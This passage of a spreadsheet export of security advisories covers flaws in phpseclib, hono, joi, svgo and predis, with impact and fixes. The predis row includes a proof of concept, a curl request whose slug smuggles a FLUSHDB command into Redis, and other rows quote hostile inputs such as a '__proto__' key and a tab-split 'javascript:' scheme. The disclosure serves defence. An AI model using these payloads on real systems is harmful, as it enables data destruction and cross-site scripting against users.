None.</t></is></c><c r="S119" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82333</t></is></c></row><row r="120"><c r="A120" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B120" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C120" s="5" t="inlineStr"><is><t>CVE-2026-84308</t></is></c><c r="D120" s="5" t="inlineStr" /><c r="E120" s="5" t="inlineStr" /><c r="F120" s="5" t="inlineStr" /><c r="G120" s="5" t="inlineStr" /><c r="H120" s="5" t="n"><v>0.002</v></c><c r="I120" s="5" t="inlineStr" /><c r="J120" s="5" t="inlineStr" /><c r="K120" s="5" t="inlineStr" /><c r="L120" s="5" t="inlineStr"><is><t>composer:phpseclib</t></is></c><c r="M120" s="5" t="inlineStr"><is><t>3.0.57, 4.0.1</t></is></c><c r="N120" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O120" s="5" t="inlineStr" /><c r="P120" s="5" t="inlineStr" /><c r="Q120" s="5" t="inlineStr"><is><t>CWE-208, CWE-385</t></is></c><c r="R120" s="5" t="inlineStr"><is><t>The pure-PHP X25519 scalar multiplication in phpseclib is not constant-time. Field addition and subtraction each perform a **data-dependent conditional modular reduction**, so the cost of each Montgomery-ladder step is a linear function of that step's reduction count which is a quantity determined by the secret scalar's *prefix*.

An observer with per-ladder-step resolution recovers the 251-bit clamped private scalar. This is a per-step leak, not an aggregate one: an instrumented code proof-of-concept recovers 20/20 test keys from 32 observed operations, and an observer that counts libgmp calls instead of timing them recovers a key from a **single** operation.

This is **not** a low-order-input issue. Recovery works with the RFC 7748 base point `u = 9`, with no attacker-chosen input at all. Rejecting low-order public values does not close it.

## 2. Affected component

Confirmed on **phpseclib 3.0.56** (338 files under `phpseclib/`,`sha256(sorted(relpath NUL file_sha256 LF)) = cc7250b611f520e809131aab0931503457c44d8cbfb10d535251c6fec5f62a2b`).
The code appears unchanged across the 3.0 series wherever Curve25519 is supported, please confirm the affected range.

| file:line | role |
|---|---|
| `Math/PrimeField/Integer.php:189` | `add()` — conditional `subtract($modulo)` when the sum ≥ p |
| `Math/PrimeField/Integer.php:207` | `subtract()` — conditional `add($modulo)` when the result is negative |
| `Crypt/EC/BaseCurves/Montgomery.php:229–234` | ladder branch on the secret bit, selecting argument order of `doubleAndAddPoint` |
| `Crypt/EC/Formats/Keys/MontgomeryPrivate.php:66` | `multiplyPoint(getBasePoint(), dA)` — **no engine check of any kind** |
| `Crypt/EC/Formats/Keys/PKCS8.php:194–200` | the same derivation, correctly gated on ext-sodium — the pattern `MontgomeryPrivate` is missing |

## 3. Technical description

Operation *counts* in the ladder are already constant — 10 field multiplications, 4 additions and 4 subtractions per step, 2560 multiplications per 256-step ladder. Operand *values* are not. Each `PrimeField\Integer::add()` / `subtract()` takes a data-dependent branch costing ~0.85–1.0 µs on the GMP engine, against a ~32 µs step period, so per-step cost is `α + β·c` where `c` is that step's conditional-reduction count. Measured across 20 keys: R² = 0.91–0.98, β = 838–920 ns.

`c` depends on the whole scalar prefix, not on the current bit, so per-step thresholding is useless — it saturates at ~93% per bit for `u = p−1` and at **chance** for `u = 9`, and recovers 0/20 keys either way, because the bit string is a prefix-XOR in which one flipped step inverts the entire tail. Conditioning on the prefix removes the ambiguity: a beam search replays both branches from each candidate ladder state, reads off the exact `c` for each, and scores against the observation. The victim's public key adjudicates the small residual search.

Two facts bound the problem and are worth stating precisely, because they determine whether a fix is needed at all:

- **Aggregate observation is provably useless.** The adjacent-bit transition count `T(k)` has exact entropy `H(T) = 4.0357` bits over clamped scalars, so a noiseless transition-count oracle still leaves ~2^247 candidates. The summed reduction count `Σc` is richer (~6.6–6.9 bits) and still leaves ~2^244. Any measurement that collapses the call to one number is safe. Per-step measurement is not.
- **The libgmp call counts are exactly determined.** Per ladder step, `__gmpz_add = 4 + csub`, `__gmpz_sub = 4 + cadd`, `__gmpz_mul = __gmpz_mod = 10`. Verified by differencing gdb breakpoint counts against phpseclib's own `doubleAndAddPoint` — 27/27 steps exact, extended independently to 64/64 and 38/38 by our two reviewers. An observer that only *counts* these calls needs no timing, no calibration and no repetition.

Results, 20 keys × 3 sampling seeds, 800 traces per path collected from **800 distinct PHP processes** (so the observations are cross-process, as real requests would be):

| observer | path | observations needed | exact 251-bit recovery |
|---|---|---|---|
| timing | key load, `u = 9` | 32 | **20/20 keys**, 95% CI [83.9%, 100%] |
| timing | ECDH, `u = p−1` | 32 | **18/20 keys**, 95% CI [69.9%, 96.8%] |
| timing | either | 8 | 18–23% of trials |
| libgmp call counts | either | **1** | 20/20 keys; tolerates 20–30% of per-step counts being wrong |

The model underlying the decoder is validated against the pinned implementation: 254/254 (key, peer) outputs match the real `DH::computeSecret`, and all four RFC 7748 §6.1 vectors match both phpseclib and the published constants.

Negative controls are clean — wrong public key, shuffled trace, wrong peer value, foreign key: 0/20 in every case. Nothing derived from the private key reaches the decoder; its inputs are the observation vector, the peer value, the victim's public key, and the public clamping constants.

## 5. Impact

In the instrumented, local model, recovery of the clamped scalar gives a permanent compromise of the X25519 private key. Clamping is applied on every call, so the recovered value is what every past and future operation with that key uses.

## 6. Restrictions

**Required for exploitation:**

1. **A reused / long-lived X25519 private key.** Ephemeral X25519 — the normal TLS and SSH case — defeats this outright. phpseclib's own SSH path generates a fresh scalar per exchange and is not affected.
2. **Knowledge of the victim's public key.** It adjudicates the decoder's residual search; without it no candidate can be selected. This is normally public, but it is a precondition, not a convenience.
3. **The pure-PHP path must actually run.** Measured across four extension configurations:
   - `EC::loadFormat('MontgomeryPrivate', $raw32)` runs the ladder in **every**
     configuration — but the format declares `IS_INVISIBLE` (`MontgomeryPrivate.php:40`),
     so `PublicKeyLoader::load` skips it and nothing inside phpseclib calls it. An
     application must name the format explicitly.
   - `PKCS8` / `PublicKeyLoader::load` / `EC::createKey` run the ladder **only when ext-sodium is absent** — `PKCS8.php:194` gates on `sodium_crypto_box_publickey_from_secretkey`. OpenSSL does not help here.
   - `DH::computeSecret` runs the ladder only under `EC::forceEngine('PHP')`, or when *both* `openssl_pkey_derive` (`DH.php:325`) and `sodium_crypto_scalarmult` (`EC/PrivateKey.php:75`) are unavailable. ext-sodium is bundled and enabled by default in PHP 7.2+, so the reachable configurations are a minority — though `disable_functions` hardening and `--disable-sodium` builds do occur, particularly in shared hosting.
4. **An observer with per-ladder-step resolution**, i.e. one that can distinguish ~0.9 µs within a ~32 µs step, or count libgmp entry-point calls. In practice that means local co-residency (e.g. a Flush+Reload spy on the shared `libgmp.so` mapping — `__gmpz_add` / `__gmpz_sub` are the correct targets; `__gmpn_*` are not, being size-dispatched internals).

## 7. Suggested remediation

1. **Constant-time, fixed-width field arithmetic, or delegate to a vetted native provider.** This is the actual fix. Removing the ladder's bit branch is *not* sufficient while `Integer.php:189` and `:207` remain operand-dependent.
2. **Gate `MontgomeryPrivate.php:66` the way `PKCS8.php:194–200` already is.** That is a one-block change and it closes the only entry point that is un-gated in every configuration. Keep the `$curve instanceof Curve25519` guard — `MontgomeryPrivate` also accepts Curve448 keys.
3. **Consider an OpenSSL arm alongside the sodium arm in `PKCS8::loadECDH`**, or fail closed, so stacks without ext-sodium do not fall through to the ladder.
4. Separately, and unrelated to this channel: the pure-PHP path returns an all-zero 32-byte shared secret for low-order peer inputs. Rejecting the full canonicalised low-order set and adding a constant-time all-zero check is correct hygiene for contributory behaviour — but it does **not** mitigate the timing channel, since recovery works with `u = 9`.

## Contact
George Stergiopoulos
Assistant Professor of cybersecurity
Athens University of Economics and Business, Greece
E: geostergiop@aueb.gr | s: https://www.aueb.gr/en/faculty_page/stergiopoulos-georgios</t></is></c><c r="S120" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84308</t></is></c></row><row r="121"><c r="A121" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B121" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C121" s="5" t="inlineStr"><is><t>CVE-2026-84363</t></is></c><c r="D121" s="5" t="inlineStr" /><c r="E121" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F121" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G121" s="5" t="inlineStr" /><c r="H121" s="5" t="n"><v>0.003</v></c><c r="I121" s="5" t="inlineStr" /><c r="J121" s="5" t="inlineStr" /><c r="K121" s="5" t="inlineStr" /><c r="L121" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M121" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N121" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O121" s="5" t="inlineStr" /><c r="P121" s="5" t="inlineStr" /><c r="Q121" s="5" t="inlineStr"><is><t>CWE-444</t></is></c><c r="R121" s="5" t="inlineStr"><is><t>### Summary

Hono's query parsing does not stop at the URL fragment: a `?` appearing after a `#` is treated as the start of a query string. As a result, the application can read request parameters that no other component involved in handling the request can see.

### Details

A fragment is never part of the query, and every standard URL consumer — browsers, `new URL()`, reverse proxies — ignores everything from the first `#` onward. Hono's routing followed that rule; its query helpers did not.

For one and the same request, this produces an interpretation differential:

- A component in front of the application that inspects the query string — filtering rules, parameter allow/deny lists, access logging — observes no parameters, while the application reads and acts on them.
- The cache middleware removed the fragment when building its cache key, so a response influenced by parameters carried inside the fragment could be stored under a key that did not reflect them and later returned to other users.

The same divergence reaches request validation and any middleware that reads query parameters.

This requires a request target containing a literal `#` to reach the application. Deployments on runtimes that normalise such a target — including Cloudflare Workers — are not affected, and neither are those behind an intermediary that strips the fragment.

### Impact

An attacker can cause the application to act on parameters that components in front of it never observe.

This may lead to:

- filtering rules, allow/deny lists, and audit logging being blind to parameters the application still processes
- a cached response being stored under a key that does not reflect the parameters used to produce it, and served to other users
- stored cross-site scripting, where such a parameter is reflected into a cached HTML response without escaping

This issue affects applications that read query parameters and run on a runtime that passes a literal `#` through to the request URL.</t></is></c><c r="S121" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84363</t></is></c></row><row r="122"><c r="A122" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B122" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C122" s="5" t="inlineStr"><is><t>CVE-2026-84364</t></is></c><c r="D122" s="5" t="inlineStr" /><c r="E122" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F122" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G122" s="5" t="inlineStr" /><c r="H122" s="5" t="n"><v>0.004</v></c><c r="I122" s="5" t="inlineStr" /><c r="J122" s="5" t="inlineStr" /><c r="K122" s="5" t="inlineStr" /><c r="L122" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M122" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N122" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O122" s="5" t="inlineStr" /><c r="P122" s="5" t="inlineStr" /><c r="Q122" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="R122" s="5" t="inlineStr"><is><t>### Summary

When `parseBody()` expands dot-separated form field names into nested objects, it does not limit the nesting depth or the total number of objects created. A request body well within a normal size limit can therefore allocate an object graph far larger than the request itself, and concurrent requests can exhaust the heap and terminate the process.

### Details

Each dot-separated segment of a field name creates an intermediate object. Neither the segments within a single field name nor the total across a request was bounded, and empty segments were preserved, so a field name could encode one nesting level per byte.

Both shapes produce the effect: a single deeply dotted field name, and a large number of shallowly dotted ones within one body. A request body size limit does not prevent it, because the amplification happens after the body has been accepted.

Dot-notation parsing is not enabled by default.

### Impact

An attacker who can reach an endpoint that parses request bodies with dot-notation enabled can send concurrent requests whose memory cost is disproportionate to their size.

This may lead to:

- exhaustion of the JavaScript heap and termination of the server process
- the service remaining unavailable until it is restarted

This issue affects applications that explicitly enable dot-notation parsing. Applications using the default behaviour are not affected.</t></is></c><c r="S122" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84364</t></is></c></row><row r="123"><c r="A123" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B123" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C123" s="5" t="inlineStr"><is><t>CVE-2026-84365</t></is></c><c r="D123" s="5" t="inlineStr" /><c r="E123" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F123" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G123" s="5" t="inlineStr" /><c r="H123" s="5" t="n"><v>0.003</v></c><c r="I123" s="5" t="inlineStr" /><c r="J123" s="5" t="inlineStr" /><c r="K123" s="5" t="inlineStr" /><c r="L123" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M123" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N123" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O123" s="5" t="inlineStr" /><c r="P123" s="5" t="inlineStr" /><c r="Q123" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R123" s="5" t="inlineStr"><is><t>### Summary

The fix released for CVE-2026-39408 does not cover every traversal sequence. `toSSG()` can still write files outside the configured output directory when a route parameter contains consecutive parent-directory segments.

### Details

Static site generation builds each output path from the route path and the values supplied through `ssgParams`, then verifies that the result stays inside the output directory. That check normalizes the path with the same routine that built it, and the routine did not fully collapse runs of consecutive parent-directory segments. A value carrying enough of them produces a path the check accepts, but the filesystem resolves outside the output directory.

The earlier fix handled a single parent-directory segment, so it blocks the sequence reported at the time while leaving longer runs unhandled. The check also treated output directories that differ only in how they are rooted as equivalent.

This arises when an application generates a static site from route parameter values it does not fully control — slugs coming from a CMS, an API, or user submissions.

### Impact

A value reaching `ssgParams` from an untrusted source can cause build output to be written outside the intended output directory, carrying whatever content the route handler produced.

This may lead to:

- files being created or overwritten elsewhere in the build environment
- generated artifacts or deployment output being altered

This affects build-time static site generation only; request-time routing is not affected. Applications whose `ssgParams` values are entirely developer-controlled are not affected.</t></is></c><c r="S123" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84365</t></is></c></row><row r="124"><c r="A124" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B124" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C124" s="5" t="inlineStr"><is><t>CVE-2026-84367</t></is></c><c r="D124" s="5" t="inlineStr" /><c r="E124" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F124" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G124" s="5" t="inlineStr" /><c r="H124" s="5" t="n"><v>0.003</v></c><c r="I124" s="5" t="inlineStr" /><c r="J124" s="5" t="inlineStr" /><c r="K124" s="5" t="inlineStr" /><c r="L124" s="5" t="inlineStr"><is><t>npm:joi</t></is></c><c r="M124" s="5" t="inlineStr"><is><t>17.13.5, 18.2.4</t></is></c><c r="N124" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O124" s="5" t="inlineStr" /><c r="P124" s="5" t="inlineStr" /><c r="Q124" s="5" t="inlineStr"><is><t>CWE-1321</t></is></c><c r="R124" s="5" t="inlineStr"><is><t>### Impact

Applications are affected only if a schema renames keys with a regular-expression source and a `Joi.expression()` / `Joi.x()` target that interpolates the pattern's own match data, combined with `{ multiple: true }`, for example `.rename(/^x-(.+)$/, Joi.x('{#1}'), { multiple: true })`. Because the target is rendered from the matched input key, an attacker who controls input keys can send `x-__proto__` with an object value and make the rename target render as `__proto__`, which sets the prototype of the object joi returns instead of creating a key on it. The global `Object.prototype` is not modified, so the effect is confined to the object returned by that one `validate()` call.

Schemas using a static string rename target are not affected, and neither are schemas left on the default `{ multiple: false }`.

### Patches

Versions 17.13.5 and 18.2.4 have been released to address the issue.

### Workarounds

1. Replace the template rename target with a static string target.
2. Keep the template but make the capture unable to produce `__proto__`, using a negative lookahead: `.rename(/^x-(?!__proto__$)(.+)$/, Joi.x('{#1}'), { multiple: true })`
3. Drop { multiple: true } from the rename, which stops the rename before the assignment.</t></is></c><c r="S124" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84367</t></is></c></row><row r="125"><c r="A125" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B125" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C125" s="5" t="inlineStr"><is><t>CVE-2026-84368</t></is></c><c r="D125" s="5" t="inlineStr" /><c r="E125" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F125" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G125" s="5" t="inlineStr" /><c r="H125" s="5" t="n"><v>0.003</v></c><c r="I125" s="5" t="inlineStr" /><c r="J125" s="5" t="inlineStr" /><c r="K125" s="5" t="inlineStr" /><c r="L125" s="5" t="inlineStr"><is><t>npm:@hapi/joi, npm:joi</t></is></c><c r="M125" s="5" t="inlineStr"><is><t>17.13.6, 18.2.5</t></is></c><c r="N125" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O125" s="5" t="inlineStr" /><c r="P125" s="5" t="inlineStr" /><c r="Q125" s="5" t="inlineStr"><is><t>CWE-1321</t></is></c><c r="R125" s="5" t="inlineStr"><is><t>### Impact
An application that passes attacker-controlled data into joi's custom message configuration (`messages()`, `message()`, `prefs({ messages })`, `Joi.extend({ messages })` or `rule({ message })`) lets the attacker write properties onto `Object.prototype`, where every object in the process then inherits them. A key named `__proto__` was treated as a language name, and the code reused the object it found at that key, which resolves to the prototype rather than to a new own property; a key named `constructor` did the same to the `Object` function's statics. A consuming application that gates on the mere presence of a property (`if (user.isAdmin)`) can be made to take the wrong branch for every object it inspects.

This is not reachable from data that joi validates. Custom messages are schema-construction configuration, normally written by the application developer. Exploitation therefore requires an application that feeds untrusted input straight into schema construction.

### Patches
Upgrade to version 18.2.5 or 17.13.6.

### Workarounds
Do not pass untrusted input into `messages()`, `message()`, `prefs({ messages })`, `Joi.extend({ messages })` or `rule({ message })`. Or validate that they don't contain any `__proto__` or `constructor` property.</t></is></c><c r="S125" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84368</t></is></c></row><row r="126"><c r="A126" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B126" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C126" s="5" t="inlineStr"><is><t>CVE-2026-84369</t></is></c><c r="D126" s="5" t="inlineStr" /><c r="E126" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F126" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G126" s="5" t="inlineStr" /><c r="H126" s="5" t="n"><v>0.003</v></c><c r="I126" s="5" t="inlineStr" /><c r="J126" s="5" t="inlineStr" /><c r="K126" s="5" t="inlineStr" /><c r="L126" s="5" t="inlineStr"><is><t>npm:svgo</t></is></c><c r="M126" s="5" t="inlineStr"><is><t>2.8.4, 3.3.5, 4.1.0</t></is></c><c r="N126" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O126" s="5" t="inlineStr" /><c r="P126" s="5" t="inlineStr" /><c r="Q126" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R126" s="5" t="inlineStr"><is><t>## Summary

SVGO's opt-in `removeScripts` plugin did not inspect executable HTML content inside SVG `&lt;foreignObject&gt;` elements. Applications that used this plugin as their only protection for untrusted SVG input could produce SVGs containing active HTML and expose users to cross-site scripting (XSS).

SVGO is an optimizer rather than a comprehensive sanitization library, but `removeScripts` is maintained for consumers that already rely on it to remove common script execution paths.

## Details

Although the plugin removed SVG and XHTML `&lt;script&gt;` elements, it left other HTML execution paths inside `&lt;foreignObject&gt;` unchanged. These included:

- event-handler attributes such as `onload` and `onbeforetoggle`;
- `srcdoc` documents, including on `&lt;iframe&gt;` elements;
- executable URLs in HTML attributes such as `action`, `data`, `formaction`, `href`, and `src`.

An attacker could place one of these payloads in an SVG. If an application optimized the untrusted SVG with `removeScripts` and then served the result in an active browser context, the payload could execute in the viewer's origin.

## Impact

Successful exploitation could allow script execution in the context where the optimized SVG is rendered. Depending on the embedding and origin configuration, this could expose cookies or local storage, modify content, or perform actions as the victim.

The plugin is opt-in, so consumers that do not enable `removeScripts`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preserves visual HTML inside SVG `&lt;foreignObject&gt;` elements while removing event attributes, `srcdoc`, and executable URL values from active HTML URL attributes.

SVGO v1 is no longer maintained. Users of v1 should upgrade to a supported release line.

## Workarounds

For hostile input, use a dedicated SVG sanitization tool before passing the SVG to SVGO. As defense in depth, applications can reject or remove `&lt;foreignObject&gt;` content and avoid serving user-controlled SVGs in an active same-origin context.</t></is></c><c r="S126" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84369</t></is></c></row><row r="127"><c r="A127" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B127" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C127" s="5" t="inlineStr"><is><t>CVE-2026-84370</t></is></c><c r="D127" s="5" t="inlineStr" /><c r="E127" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F127" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G127" s="5" t="inlineStr" /><c r="H127" s="5" t="n"><v>0.003</v></c><c r="I127" s="5" t="inlineStr" /><c r="J127" s="5" t="inlineStr" /><c r="K127" s="5" t="inlineStr" /><c r="L127" s="5" t="inlineStr"><is><t>npm:svgo</t></is></c><c r="M127" s="5" t="inlineStr"><is><t>2.8.4, 3.3.5, 4.1.0</t></is></c><c r="N127" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O127" s="5" t="inlineStr" /><c r="P127" s="5" t="inlineStr" /><c r="Q127" s="5" t="inlineStr"><is><t>CWE-79, CWE-184</t></is></c><c r="R127" s="5" t="inlineStr"><is><t>## Summary

SVGO's opt-in `removeScripts` plugin failed to remove some executable links. Namespace-prefixed SVG anchors and URL schemes containing ASCII tabs or newlines could bypass its checks. Applications that used this plugin as their only protection for untrusted SVG input could expose users to cross-site scripting (XSS).

SVGO is an optimizer rather than a comprehensive sanitization library, but `removeScripts` is maintained for consumers that already rely on it to remove common script execution paths.

## Details

Two related bypasses were present:

1. The plugin inspected unprefixed SVG `&lt;a&gt;` elements but did not recognize namespace-prefixed SVG anchors such as `&lt;svg:a&gt;` when the prefix was bound to the SVG namespace. Their executable `href` or namespaced `*:href` values remained intact.
2. The URL check did not account for ASCII tab, line-feed, or carriage-return characters embedded in a scheme. Browsers remove these characters before parsing the scheme, so values such as `java&amp;#9;script:` could remain executable after bypassing the plugin's `javascript:` check.

Anchors in unrelated custom namespaces are not executable SVG anchors and remain untouched.

## Impact

If an application optimized attacker-controlled SVGs with `removeScripts` and then served the result in an active browser context, a victim could follow a link that executes script in the SVG's origin. Depending on the embedding and origin configuration, this could expose cookies or local storage, modify content, or perform actions as the victim.

The plugin is opt-in, so consumers that do not enable it are not relying on the affected behavior. Typical local optimization of trusted SVG files is not affected.

## Patches

Upgrade to one of the following releases for the maintained release line in use:

| Release line | Patched version | Plugin |
| --- | --- | --- |
| v2 | 2.8.4 | `removeScriptElement` |
| v3 | 3.3.5 | `removeScriptElement` |
| v4 | 4.1.0 | `removeScripts` |

The fix makes SVG anchor handling namespace-aware and strips ASCII tabs, line feeds, and carriage returns before checking executable URL schemes.

SVGO v1 is no longer maintained. Users of v1 should upgrade to a supported release line.

## Workarounds

For hostile input, use a dedicated SVG sanitization tool before passing the SVG to SVGO. Applications can also reject links from untrusted SVG input and avoid serving user-controlled SVGs in an active same-origin context.

## References

- v4 fix: https://github.com/svg/svgo/pull/2268
- related executable URL hardening: https://github.com/svg/svgo/pull/2263
- v3 backport: https://github.com/svg/svgo/pull/2269
- v2 backport: https://github.com/svg/svgo/pull/2272
- v4.1.0 release: https://github.com/svg/svgo/releases/tag/v4.1.0
- v3.3.5 release: https://github.com/svg/svgo/releases/tag/v3.3.5
- v2.8.4 release: https://github.com/svg/svgo/releases/tag/v2.8.4</t></is></c><c r="S127" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84370</t></is></c></row><row r="128"><c r="A128" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B128" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C128" s="5" t="inlineStr"><is><t>CVE-2026-84372</t></is></c><c r="D128" s="5" t="inlineStr" /><c r="E128" s="5" t="inlineStr" /><c r="F128" s="5" t="inlineStr" /><c r="G128" s="5" t="inlineStr" /><c r="H128" s="5" t="n"><v>0.004</v></c><c r="I128" s="5" t="inlineStr" /><c r="J128" s="5" t="inlineStr"><is><t>redis</t></is></c><c r="K128" s="5" t="inlineStr" /><c r="L128" s="5" t="inlineStr"><is><t>composer:predis/predis</t></is></c><c r="M128" s="5" t="inlineStr"><is><t>3.3.0</t></is></c><c r="N128" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O128" s="5" t="inlineStr" /><c r="P128" s="5" t="inlineStr" /><c r="Q128" s="5" t="inlineStr"><is><t>CWE-93</t></is></c><c r="R128" s="5" t="inlineStr"><is><t>### Summary

An improper CRLF neutralization flaw in Predis' pipeline handling on
aggregate connections lets an unauthenticated attacker who can influence any
pipelined argument — a value **or** a key, e.g. a URL slug used as a cache key —
smuggle arbitrary Redis commands into the connection.

- On **cluster** connections (`cluster` option, incl. client-side sharding) this
  is remote command injection: shard-wide `FLUSHDB`, targeted `DEL`/`SET`,
  same-slot key theft via `GET`, cache poisoning, and possible node/cluster
  outage.
- On **replication** connections (`replication` option) it is a reliable,
  repeatable denial of service (uncaught fatal error) triggered by any value
  containing `\r\n`.

### Details

When a pipeline is executed over an aggregate connection,
`AbstractAggregateConnection::write()` re-parses the already-serialized pipeline
buffer with `explode("\r\n")` instead of honoring RESP length prefixes:

- https://github.com/predis/predis/blob/v3.2.0/src/Connection/AbstractAggregateConnection.php#L78-L94
  - splits the buffer on `\r\n`, ignoring `$&lt;len&gt;` bulk lengths,
  - rebuilds each chunk via `Command::deserializeCommand()`
    (https://github.com/predis/predis/blob/v3.2.0/src/Command/Command.php#L157)
    to decide routing,
  - writes each chunk to the connection chosen for that (fake) command.

RESP is length-prefixed, so the Redis **server** parses the original stream
correctly — but this second, client-side parser treats attacker-controlled
`\r\n` sequences as command boundaries. An argument such as:

    PAD\r\n*1\r\n$7\r\nFLUSHDB

is a single data value to the server, but a complete, valid `FLUSHDB` command to
the re-parser. The consequence depends on the connection type:

- **Replication:** a pipeline forces `switchToMaster()`, so all chunks go to the
  master and the byte stream stays intact — but the misaligned chunk makes
  `deserializeCommand()` throw an uncaught `UnexpectedValueException: Invalid
  serializing format`. Any value containing `\r\n` (binary serializers such as
  igbinary/msgpack, or multi-line text) reliably crashes the request. This is
  the crash tracked in #1574 — an unauthenticated, repeatable DoS.
- **Cluster:** chunks are routed to different nodes by slot, so the byte stream
  is split across sockets. The smuggled command arrives on a node whose stream
  is clean and is **executed**, though the application never sent it:
  - `FLUSHDB` wipes an entire shard. It has no key but is routable because
    `ClusterStrategy::getFakeKey()` hardcodes the fake key `'key'`
    (https://github.com/predis/predis/blob/v3.2.0/src/Cluster/ClusterStrategy.php#L56
    and #L243-L246), so the smuggled command always lands on the node serving
    `slot('key')`.
  - `INFO` (same fake-key routing) leaks server configuration via orphaned
    responses; `CLUSTER FLUSHSLOTS` can take a node down.
  - Same-slot `GET`/`SET`/`DEL` allow key theft (the reply is attributed to the
    application's own later command on that slot), cache poisoning and targeted
    data destruction; junk-key floods can exhaust node memory (OOM / mass
    eviction of legitimate keys).
  - Lua execution is **not** reachable: `EVAL` cannot be reconstructed (the
    class is `EVAL_` due to the PHP reserved word), `EVAL_RO` fails the `Keys`
    trait validation, and `EVALSHA` requires a pre-loaded script. This is
    accidental, not a designed mitigation, and does not reduce severity —
    `FLUSHDB`/`DEL`/`SET` alone already permit full cache wipes and data
    destruction.

**Affected versions.** Introduced in v3.0.0 by PR #1438 ("Improved pipeline
abstractions"). Affected range: **3.0.0-RC1 through 3.2.0** (v3.0.0-alpha1 is not
affected — the vulnerable code was added after it). v1.x and v2.x are not
affected; their pipelines write per-command via `writeRequest()` and the
vulnerable code path does not exist.

Only `pipeline()` reaches the vulnerable sink; `transaction()` / `MULTI` paths do
not.

### Proof of concept

Two plain `redis:8` containers acting as two shards (PredisCluster shards
client-side, so Redis itself need not be in cluster mode); a PHP app on a
vulnerable Predis checkout (e.g. v3.2.0).

`docker-compose.yml`:

    services:
      redis1:
        image: redis:8
        ports: ["6391:6379"]
      redis2:
        image: redis:8
        ports: ["6392:6379"]

`index.php` (a normal-looking app — slug from URL → cache lookup):

    &lt;?php
    require __DIR__ . '/vendor/autoload.php';

    $nodes  = ['tcp://127.0.0.1:6391', 'tcp://127.0.0.1:6392'];
    $client = new Predis\Client($nodes, ['cluster' =&gt; 'predis',
                'parameters' =&gt; ['read_write_timeout' =&gt; 2]]);

    if (isset($_GET['seed'])) {
        for ($i = 1; $i &lt;= 100; $i++) { $client-&gt;set("user:$i", "data$i"); }
        exit('seeded');
    }

    $slug = $_GET['slug'] ?? '';
    try {
        [$doc] = $client-&gt;pipeline()-&gt;get("slug:$slug")-&gt;execute();
        echo $doc ?: 'no such slug';
    } catch (Throwable $e) {
        http_response_code(500);
        echo get_class($e);
    }

Run:

    composer require predis/predis:3.2.0
    docker compose up -d
    php -S 127.0.0.1:8080 -t .
    curl 'http://127.0.0.1:8080/?seed'                       # 100 keys

Attack (smuggled `FLUSHDB` inside the slug):

    curl 'http://127.0.0.1:8080/?slug=PAD4%0D%0A*1%0D%0A%247%0D%0AFLUSHDB'

The slug's first line must hash to a different shard than the fake key `'key'`
(otherwise the truncated bytes swallow the injection and the request simply
